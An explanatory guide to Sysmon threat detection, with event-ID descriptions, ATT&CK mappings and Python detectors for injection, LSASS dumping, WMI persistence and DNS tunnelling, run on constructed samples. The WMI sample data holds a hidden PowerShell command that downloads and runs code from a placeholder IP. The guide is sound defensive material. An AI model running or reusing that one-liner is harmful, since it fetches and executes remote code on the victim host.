How to use Sysmon to detect threats

Sysmon (System Monitor) is a Windows service and device driver from Microsoft Sysinternals that records system activity to the Windows event log (the Microsoft-Windows-Sysmon/Operational channel). Each event carries the fields needed to investigate threats and attacks on Windows endpoints: which process did what, to which target, under which user, with hashes and a ProcessGuid that ties later events back to the process that caused them. Collected centrally and correlated, these events give detailed insight into what is happening on a Windows system and make malicious behaviour stand out.

To use Sysmon effectively you need to understand both the events it can generate and the configuration that decides which of them it actually writes. Sysmon has close to thirty event types covering process creation, network connections, registry activity, file creation, driver and image loading, named pipes, WMI subscriptions and DNS queries. Which of those are logged, and for which processes, is governed entirely by an XML configuration of include and exclude rules; without a tuned configuration Sysmon logs little beyond process creation and driver loads, which is why most deployments start from a community baseline such as SwiftOnSecurity's sysmon-config or Olaf Hartong's sysmon-modular. With a good configuration, analysts can detect a wide range of threat behaviours, including process injection, lateral movement, credential dumping and data exfiltration.

Sysmon itself has no knowledge of the MITRE ATT&CK matrix; the mapping between events and techniques is something you add in the configuration. Every rule can carry a name, and that name is written into the RuleName field of each event the rule matches. The sysmon-modular configuration uses this to tag rules with the technique they detect (for example a RuleName of technique_id=T1055,technique_name=Process Injection), so an analyst or a SIEM query can pivot directly from an event to the tactic and technique it indicates. The same Sysmon event type is usually evidence for several techniques depending on which rule fired, so the mapping belongs on the rule, not on the event ID.

Here are a few examples of how Sysmon can be used to detect threats mapped to specific MITRE IDs:

  1. Process Injection (T1055) Process injection executes attacker code inside a legitimate process. Sysmon surfaces it through “Event ID 8 – CreateRemoteThread”, which is generated when one process creates a thread in another process's address space, whichever API was used to do it. The event records the source and target images and the new thread's StartAddress, StartModule and StartFunction; a start address that no loaded module backs (Sysmon logs StartModule as “-”), or a source image outside the Windows directory, is the usual sign of injected code. Injection that hijacks an existing thread instead (QueueUserAPC, SetThreadContext) creates no new thread, so it has to be caught from the handle opened first (Event ID 10) or, for process hollowing, from Event ID 25.
  2. Lateral Movement (T1021) Lateral movement is how attackers reach additional systems once one host is compromised. On the source host, “Event ID 3 – Network Connection” records the process behind each outbound connection, so connections to SMB (445), RPC (135 plus a high port), RDP (3389) or WinRM (5985/5986) from an unexpected image such as a script host or an Office process are a strong signal. Event ID 3 is high-volume and disabled by default, so it needs include rules for the ports and images you care about. On the destination host, pair it with “Event ID 1 – Process creation”: services.exe spawning PSEXESVC.exe (PsExec), wmiprvse.exe spawning a shell (WMI) or wsmprovhost.exe as a parent (WinRM) shows the remote execution that completes the move.
  3. Credential Dumping (T1003) Credential dumping steals credentials from a compromised system, most often by reading the memory of lsass.exe. “Event ID 10 – Process Access” is generated when a process opens a handle to another process and records SourceImage, TargetImage, the GrantedAccess mask and a CallTrace of the caller. Dumping tools need PROCESS_VM_READ (0x0010) on lsass.exe, so look for GrantedAccess values such as 0x1010 (PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION, Mimikatz's default), 0x1410 or 0x1FFFFF (PROCESS_ALL_ACCESS) from any image outside a short allowlist of OS and security products; a CallTrace containing UNKNOWN means the call came from memory no module on disk backs, which points to shellcode or a reflectively loaded DLL.
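The Event ID 8 and Event ID 10 checks described above, as an added Python example (this is not code from the original article or from Sysmon): it parses events in the XML shape Sysmon writes to the event log and applies the two checks to constructed sample events. The allowlist, the heuristics and the sample paths are assumptions to tune per environment, not a vetted baseline.

```python
"""Detections for Sysmon Event ID 8 (CreateRemoteThread) and Event ID 10
(ProcessAccess), run over constructed sample events.

Added example for this article, not code from Sysmon or the original page.
The sample events are hand-built in the XML shape Sysmon writes to the event
log; the allowlist and heuristics are illustrative assumptions.
"""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory

# Assumption: signed OS binaries that routinely open lsass.exe in this environment.
LSASS_ALLOWLIST = {
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
    "c:\\windows\\system32\\svchost.exe",
}


def parse_sysmon_event(xml_text):
    """Return (event_id, {Data Name: value}) from one Sysmon event in XML form."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find(f"{NS}System/{NS}EventID").text)
    fields = {d.get("Name"): (d.text or "")
              for d in root.find(f"{NS}EventData").findall(f"{NS}Data")}
    return event_id, fields


def check_process_access(f):
    """Event 10: a handle to lsass.exe with memory-read rights from an unexpected image."""
    if not f.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    if not int(f.get("GrantedAccess", "0x0"), 16) & PROCESS_VM_READ:
        return None
    if f.get("SourceImage", "").lower() in LSASS_ALLOWLIST:
        return None
    reasons = [f"GrantedAccess {f['GrantedAccess']} includes PROCESS_VM_READ"]
    # UNKNOWN in the call trace is a frame in memory no module on disk backs:
    # injected shellcode or a reflectively loaded DLL.
    if "UNKNOWN" in f.get("CallTrace", ""):
        reasons.append("CallTrace has a frame in unbacked memory")
    return {"event_id": 10, "technique": "T1003.001",
            "source": f["SourceImage"], "target": f["TargetImage"], "reasons": reasons}


def check_create_remote_thread(f):
    """Event 8: a thread started in another process from an image outside C:\\Windows,
    or at a start address no loaded module backs (Sysmon logs StartModule as '-')."""
    reasons = []
    if not f.get("SourceImage", "").lower().startswith("c:\\windows\\"):
        reasons.append("source image outside C:\\Windows")
    if f.get("StartModule", "-") in ("", "-"):
        reasons.append("StartAddress not backed by a module")
    if not reasons:
        return None
    return {"event_id": 8, "technique": "T1055",
            "source": f["SourceImage"], "target": f["TargetImage"], "reasons": reasons}


CHECKS = {8: check_create_remote_thread, 10: check_process_access}


def detect(xml_events):
    """Run the matching check for every event and return the alerts raised."""
    alerts = []
    for xml_text in xml_events:
        event_id, fields = parse_sysmon_event(xml_text)
        check = CHECKS.get(event_id)
        alert = check(fields) if check else None
        if alert:
            alerts.append(alert)
    return alerts


def _event(event_id, **fields):
    """Build a constructed Sysmon event in the log's XML shape (sample data only)."""
    data = "".join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS[1:-1]}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{data}</EventData></Event>")


SAMPLE_EVENTS = [  # constructed, not captured from a real host
    _event(10, SourceImage="C:\\Windows\\System32\\csrss.exe",
           TargetImage="C:\\Windows\\System32\\lsass.exe", GrantedAccess="0x1000",
           CallTrace="C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4"),
    _event(10, SourceImage="C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe",
           TargetImage="C:\\Windows\\System32\\lsass.exe", GrantedAccess="0x1010",
           CallTrace="C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|UNKNOWN(000001D2A8F40000)"),
    _event(8, SourceImage="C:\\Windows\\System32\\rundll32.exe",
           TargetImage="C:\\Windows\\explorer.exe", StartAddress="0x000001D2A8F41000",
           StartModule="-", StartFunction="-"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On a live host the same XML comes out of `Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' | ForEach-Object { $_.ToXml() }`, so `detect` can be fed exported events directly. The first sample (csrss.exe with 0x1000, query-only rights) is ignored; the handle from the Temp directory with 0x1010 and an unbacked frame, and the remote thread with no backing module, each raise an alert.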

Here is the full list of Sysmon event IDs as of Sysmon v15, with a brief description of each:

  1. Event ID 1: Process creation This event is generated when a new process is created. It includes the parent process and its command line, the full command line of the new process, the current directory, the user, the integrity level, hashes of the image, and the ProcessGuid that later events from the same process carry.
  2. Event ID 2: A process changed a file creation time This event is generated when a process explicitly changes the creation time of a file, recording the previous and new timestamps. Attackers do this (timestomping) to make dropped files look as old as the system files around them.
  3. Event ID 3: Network connection This event is generated when a process establishes a TCP or UDP connection, including source and destination IP, port and hostname, the protocol, and whether the connection was initiated by the process. It is disabled by default because of its volume.
  4. Event ID 4: Sysmon service state changed This event is generated when the Sysmon service starts or stops. A stop outside a maintenance window is a sign that someone is trying to blind the sensor.
  5. Event ID 5: Process terminated This event is generated when a process exits, including the process ID, ProcessGuid and image path. It does not include an exit code.
  6. Event ID 6: Driver loaded This event is generated when a kernel driver is loaded, including the driver file path, its hashes, and its signature status and signer. Unsigned drivers or drivers signed by an unexpected vendor are the things to look for.
  7. Event ID 7: Image loaded This event is generated when a DLL or other image is loaded into a process, including the process, the image path, its hashes and signature information. It is very high volume and needs tight include rules (for example DLLs loaded from user-writable paths, or well-known DLLs loaded by unexpected processes).
  8. Event ID 8: CreateRemoteThread This event is generated when a process creates a thread in another process, including both images and the new thread's StartAddress, StartModule and StartFunction; a common indicator of process injection.
  9. Event ID 9: RawAccessRead This event is generated when a process reads from a drive using the \\.\ device notation, bypassing the file system. Tools use this to read locked or protected files such as the SAM hive or ntds.dit without generating file access events.
  10. Event ID 10: ProcessAccess This event is generated when a process opens a handle to another process, including the source and target images, the GrantedAccess mask and a CallTrace. Access to lsass.exe with memory-read rights is the classic credential-dumping indicator.
  11. Event ID 11: FileCreate This event is generated when a file is created or overwritten, including the file path, the creating process and user, and the file's creation time. Startup folders, Temp directories and executable extensions in user-writable paths are the usual rule targets.
  12. Event ID 12: RegistryEvent (Object create and delete) This event is generated when a registry key or value is created or deleted, including the key or value path and the operation type.
  13. Event ID 13: RegistryEvent (Value Set) This event is generated when a registry value is written, including the key and value path and, for string and DWORD/QWORD types, the data written. Run keys, services and other autostart locations are the usual rule targets.
  14. Event ID 14: RegistryEvent (Key and Value Rename) This event is generated when a registry key or value is renamed, including the old and new names.
  15. Event ID 15: FileCreateStreamHash This event is generated when a named alternate data stream is created on a file, including the file path, the stream name and the hash of the stream contents. It catches both attackers hiding data in alternate streams and, through the Zone.Identifier stream (Mark of the Web), files downloaded by browsers and mail clients.
  16. Event ID 16: Sysmon config state changed This event is generated when a new Sysmon configuration is loaded, including the configuration file path and its hash. An unexpected configuration change usually means someone is narrowing what Sysmon records.
  17. Event ID 17: PipeEvent (Pipe Created) This event is generated when a named pipe is created, including the pipe name and the creating process. Default pipe names of offensive frameworks and of tools such as PsExec are commonly matched here.
  18. Event ID 18: PipeEvent (Pipe Connected) This event is generated when a process connects to a named pipe, including the pipe name and the connecting process.
  19. Event ID 19: WmiEvent (WmiEventFilter activity detected) This event is generated when a WMI event filter is registered, including the namespace, the filter name and its WQL query.
  20. Event ID 20: WmiEvent (WmiEventConsumer activity detected) This event is generated when a WMI event consumer is registered, including the consumer name, its type (for example a command-line or active-script consumer) and the command or script it will run.
  21. Event ID 21: WmiEvent (WmiEventConsumerToFilter activity detected) This event is generated when a consumer is bound to a filter. Events 19, 20 and 21 together describe a complete WMI event subscription, the persistence mechanism.
  22. Event ID 22: DNSEvent (DNS query) This event is generated when a process performs a DNS query, including the query name, the status code and the results returned, attributed to the requesting process. Query type is not recorded.
  23. Event ID 23: FileDelete (File Delete archived) This event is generated when a file is deleted, including the file path, the deleting process and user and the file's hash, and a copy of the deleted file is saved to the Sysmon archive directory for later analysis.
  24. Event ID 24: ClipboardChange (New content in the clipboard) This event is generated when the clipboard text changes, including the process that changed it, the session and a hash of the content. The content itself is written to the archive directory, not into the event.
  25. Event ID 25: ProcessTampering (Process image change) This event is generated when a process's image is replaced or altered after creation, as in process hollowing and process herpaderping, both techniques for running code under the appearance of a legitimate image.
  26. Event ID 26: FileDeleteDetected (File Delete logged) This event is generated when a file is deleted, with the same fields as Event ID 23, but without archiving a copy of the file.
  27. Event ID 27: FileBlockExecutable This event is generated when Sysmon blocks the creation of an executable (PE) file that matches a rule. Detection is based on the file's content, not its extension, so an executable saved with a disguised extension is still caught.
  28. Event ID 28: FileBlockShredding This event is generated when Sysmon blocks an attempt to overwrite a file with the write pattern used by secure-delete tools such as SDelete, preserving evidence an attacker is trying to destroy.
  29. Event ID 29: FileExecutableDetected This event is generated when an executable (PE) file is created and matches a rule, logging the creation without blocking it. Like Event ID 27 it is content-based.
  30. Event ID 255: Error This event is generated when Sysmon encounters an internal error, for example when it fails to parse a configuration or runs out of resources.

There are no Sysmon event IDs between 29 and 255. In particular Sysmon does not record service installation or network packet captures; for service creation use System log event 7045 (or Security log event 4697), and for capture activity watch for the capture tools themselves with Event ID 1 and Event ID 6.

By monitoring these Sysmon IDs, security professionals can detect a wide range of threats and suspicious activity, including process injection, credential dumping, file and registry modifications, and more. By correlating this information with other security data sources, such as network logs and endpoint protection systems, analysts can quickly identify and respond to potential security incidents.

Here are some examples of how these Sysmon IDs can be used to detect threat activity, with the MITRE ATT&CK techniques they are evidence for:

  1. Event ID 20: WmiEvent (WmiEventConsumer activity detected)

Example: Attackers register a WMI event consumer that runs a command or script whenever a bound filter fires, for example at logon or a few minutes after boot, giving them fileless persistence that survives reboots. Monitoring Event ID 20 shows every new consumer together with the command or script it will execute; correlating it with Event ID 19 (the filter and its WQL query) and Event ID 21 (the binding) reconstructs the whole subscription. Outside of software installers and management agents, new CommandLineEventConsumer or ActiveScriptEventConsumer registrations are rare enough to review individually.

Mapped to MITRE ATT&CK techniques: T1546.003: Event Triggered Execution: Windows Management Instrumentation Event Subscription, T1047: Windows Management Instrumentation.
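Correlating the three WMI events into one alert, as an added Python example (not code from the original article or from Sysmon): it takes already-parsed Event 19, 20 and 21 field dictionaries in the layout Sysmon uses for those events, joins each binding to its filter and consumer, and reports only bindings whose consumer class can execute code. The sample events and the list of trigger-query fragments are constructed assumptions.

```python
"""Correlating Sysmon WMI events 19 (filter), 20 (consumer) and 21 (binding)
into a single persistence alert.

Added example for this article, not code from Sysmon or the original page.
The events below are constructed dicts in the field layout of the three
Sysmon WMI events; the trigger-query fragments are an illustrative assumption.
"""
import re

# Consumer classes that run attacker-supplied commands or scripts when the
# bound filter fires; the other consumer classes only write logs or send mail.
EXECUTING_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}

# Assumption: WQL fragments commonly used as persistence triggers.
TRIGGER_PATTERNS = ("Win32_ProcessStartTrace", "Win32_LogonSession",
                    "__InstanceModificationEvent", "Win32_LocalTime")

_REF = re.compile(r'(\w+)\.Name="([^"]+)"')  # e.g. __EventFilter.Name="Updater"


def parse_wmi_ref(ref):
    """Split a WMI object reference like 'Class.Name="X"' into (Class, X)."""
    m = _REF.search(ref)
    return (m.group(1), m.group(2)) if m else (None, ref)


def correlate_wmi_subscriptions(events):
    """events: iterable of (event_id, fields). Returns one alert per binding (21)
    that joins a filter (19) to a consumer (20) capable of executing code."""
    filters, consumers, alerts = {}, {}, []
    for event_id, f in events:
        if event_id == 19 and f.get("Operation") == "Created":
            filters[f["Name"]] = f
        elif event_id == 20 and f.get("Operation") == "Created":
            consumers[f["Name"]] = f
        elif event_id == 21:
            consumer_class, consumer_name = parse_wmi_ref(f["Consumer"])
            _, filter_name = parse_wmi_ref(f["Filter"])
            if consumer_class not in EXECUTING_CONSUMERS:
                continue  # log/mail consumers cannot run code; not persistence
            query = filters.get(filter_name, {}).get("Query", "")
            alerts.append({
                "technique": "T1546.003",
                "user": f.get("User"),
                "filter": filter_name,
                "query": query,
                "consumer": consumer_name,
                "consumer_class": consumer_class,
                "payload": consumers.get(consumer_name, {}).get("Destination", ""),
                "known_trigger": any(p.lower() in query.lower() for p in TRIGGER_PATTERNS),
            })
    return alerts


SAMPLE_WMI_EVENTS = [  # constructed, not captured from a real host
    (19, {"EventType": "WmiFilterEvent", "Operation": "Created", "User": "CORP\\bob",
          "EventNamespace": "root\\CimV2", "Name": "Updater",
          "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE "
                   "TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' "
                   "AND TargetInstance.SystemUpTime >= 240"}),
    (20, {"EventType": "WmiConsumerEvent", "Operation": "Created", "User": "CORP\\bob",
          "Name": "Updater", "Type": "Command Line",
          "Destination": "powershell.exe -nop -w hidden -c \"IEX (New-Object "
                         "Net.WebClient).DownloadString('http://198.51.100.7/a')\""}),
    (21, {"EventType": "WmiBindingEvent", "Operation": "Created", "User": "CORP\\bob",
          "Consumer": 'CommandLineEventConsumer.Name="Updater"',
          "Filter": '__EventFilter.Name="Updater"'}),
    # A default Windows binding: logs to the event log, cannot execute code.
    (21, {"EventType": "WmiBindingEvent", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
          "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
          "Filter": '__EventFilter.Name="SCM Event Log Filter"'}),
]

if __name__ == "__main__":
    for alert in correlate_wmi_subscriptions(SAMPLE_WMI_EVENTS):
        print(alert)
```

The binding event is the anchor because a filter or consumer on its own does nothing; the benign SCM Event Log binding that every Windows install carries is dropped by the consumer-class check rather than by name, so a renamed malicious consumer still surfaces.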

  2. Event ID 22: DNSEvent (DNS query)

Example: Attackers use DNS for command-and-control, either resolving algorithmically generated domains to find their server or tunnelling commands and stolen data inside query names, because DNS is almost never blocked at the perimeter. Event ID 22 attributes every query to the process that made it, so a process that should never resolve names (a document viewer, a binary in a Temp or Roaming directory) issuing lookups is suspicious on its own, and long high-entropy labels, many distinct subdomains of one base domain from a single process, or a stream of NXDOMAIN responses (QueryStatus 9003) point to tunnelling or DGA behaviour.

Mapped to MITRE ATT&CK techniques: T1071.004: Application Layer Protocol: DNS, T1568: Dynamic Resolution, T1048: Exfiltration Over Alternative Protocol.
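The DNS heuristics just described, as an added Python example (not code from the original article or from Sysmon): it scores Event 22 field dictionaries (QueryName, QueryStatus, Image) per query for label length and entropy, and per process for the number of distinct subdomains asked of one base domain. The thresholds, the two-label approximation of a registrable domain and the sample queries are constructed assumptions.

```python
"""Heuristics over Sysmon Event ID 22 (DNSEvent) for tunnelling and DGA lookups.

Added example for this article, not code from Sysmon or the original page.
The events are constructed dicts in the Event 22 field layout; thresholds and
the two-label approximation of a registrable domain are illustrative assumptions.
"""
import hashlib
import math
from collections import Counter, defaultdict

MAX_LABEL_LEN = 40          # a single label this long is rare outside tunnels
MIN_ENTROPY_LEN = 20        # only score entropy on names long enough to mean something
ENTROPY_THRESHOLD = 3.8     # bits per character; word-like names sit well below this
MAX_UNIQUE_SUBDOMAINS = 25  # distinct subdomains one process asks of one base domain


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty string)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def split_domain(qname):
    """Return (subdomain, base_domain), taking the last two labels as the base.
    Assumption: no public-suffix list offline, so 'co.uk'-style suffixes are approximated."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def score_query(f):
    """Per-query heuristics; returns the list of reasons (empty means it looks normal)."""
    labels = f.get("QueryName", "").rstrip(".").lower().split(".")
    reasons = []
    if any(len(label) > MAX_LABEL_LEN for label in labels):
        reasons.append("label longer than %d chars" % MAX_LABEL_LEN)
    compact = "".join(labels[:-1])  # everything but the TLD, dots removed
    if len(compact) >= MIN_ENTROPY_LEN and shannon_entropy(compact) > ENTROPY_THRESHOLD:
        reasons.append("high-entropy name (%.2f bits/char)" % shannon_entropy(compact))
    if len(labels) > 6:
        reasons.append("unusually deep label nesting")
    return reasons


def analyse_dns_events(events):
    """events: iterable of Event 22 field dicts. Returns per-query alerts plus one
    tunnelling alert per (Image, base domain) exceeding MAX_UNIQUE_SUBDOMAINS."""
    alerts, subdomains_seen = [], defaultdict(set)
    for f in events:
        sub, base = split_domain(f.get("QueryName", ""))
        if sub:
            subdomains_seen[(f.get("Image", ""), base)].add(sub)
        reasons = score_query(f)
        if reasons:
            alerts.append({"kind": "query", "technique": "T1071.004", "image": f.get("Image"),
                           "query": f.get("QueryName"), "reasons": reasons})
    for (image, base), subs in subdomains_seen.items():
        if len(subs) >= MAX_UNIQUE_SUBDOMAINS:
            alerts.append({"kind": "tunnel", "technique": "T1048", "image": image,
                           "base_domain": base, "unique_subdomains": len(subs)})
    return alerts


_TUNNEL_IMAGE = "C:\\Users\\bob\\AppData\\Roaming\\svc.exe"
SAMPLE_DNS_EVENTS = [  # constructed, not captured from a real host
    {"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "QueryName": "www.microsoft.com", "QueryStatus": "0"},
    {"Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
     "QueryName": "autodiscover.contoso.com", "QueryStatus": "0"},
    # DGA-style name that does not resolve (9003 = DNS_ERROR_RCODE_NAME_ERROR)
    {"Image": _TUNNEL_IMAGE, "QueryName": "q1w2e3r4t5y6u7i8o9p0.net", "QueryStatus": "9003"},
] + [
    # 30 hex-encoded chunks sent as subdomains of one base domain, as a DNS tunnel does
    {"Image": _TUNNEL_IMAGE, "QueryStatus": "0",
     "QueryName": hashlib.sha256(str(i).encode()).hexdigest()[:48] + ".cdn-sync.example"}
    for i in range(30)
]

if __name__ == "__main__":
    for alert in analyse_dns_events(SAMPLE_DNS_EVENTS):
        print(alert)
```

Per-query scoring alone is noisy (CDN and telemetry hostnames are long and random-looking), which is why the aggregate count per process and base domain is the alert to page on; the per-query reasons are enrichment for the analyst who picks it up.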

  3. Event ID 27: FileBlockExecutable

Example: Attackers download or drop executables into user-writable locations such as Temp, Downloads or AppData before running them. With a FileBlockExecutable rule for those paths, Sysmon refuses the write and logs Event ID 27 with the process, the path and the hash of the blocked file. Because the check is on the file's content (a PE header), renaming the payload to .txt or .png does not evade it. This is a preventive control, so deploy it only for paths where legitimate software never writes executables, and alert on every hit.

Mapped to MITRE ATT&CK techniques: T1105: Ingress Tool Transfer, T1036: Masquerading, T1204.002: User Execution: Malicious File.

  4. Event ID 29: FileExecutableDetected

Example: Where blocking is too risky, the same rule logic can be run in detect-only mode. Event ID 29 is generated when an executable is written to a monitored path and records the writing process, the path and the file hash, so a browser, Office application or script host creating an executable, or any process writing one under a non-executable extension, is visible the moment it happens and can be checked against reputation data or followed to the Event ID 1 that later runs it.

Mapped to MITRE ATT&CK techniques: T1105: Ingress Tool Transfer, T1036.008: Masquerading: Masquerade File Type, T1059: Command and Scripting Interpreter.

  5. Event ID 11: FileCreate

Example: Attackers write scripts, loaders and staged data to disk before executing or exfiltrating them, and place files in the Startup folder to survive reboots. Event ID 11 records who created which file from which process, so rules on the Startup folders, on script and executable extensions under user-writable paths, and on system directories written to by non-installer processes catch the drop itself, before the file ever runs.

Mapped to MITRE ATT&CK techniques: T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, T1059: Command and Scripting Interpreter, T1105: Ingress Tool Transfer.

  6. Event ID 25: ProcessTampering (Process image change)

Example: Attackers start a legitimate binary and then replace its image in memory with their own code (process hollowing), or alter the file on disk while the process is being created (process herpaderping), so that process lists and Event ID 1 show a trusted name while attacker code runs. Event ID 25 is generated when Sysmon detects that the mapped image no longer matches what was launched; it records the process and the type of tampering, and any hit from a process that is not a known self-updating application deserves investigation.

Mapped to MITRE ATT&CK techniques: T1055.012: Process Injection: Process Hollowing, T1036: Masquerading.

These are just a few examples of how Sysmon IDs can be used to detect potential security threats on a system. By monitoring and analyzing this data, security professionals can gain greater visibility into the activities of attackers and better protect their systems and data.

In summary, Sysmon is a powerful tool for detecting threats on Windows endpoints. By monitoring and analyzing the events it generates, analysts can detect a wide range of threat behaviours and identify the tactics and techniques attackers are using. Tagging the configuration's rules with the ATT&CK technique IDs they detect, so that the technique travels in each event's RuleName field, lets analysts correlate events with specific behaviours quickly and build a fuller picture of an intrusion.
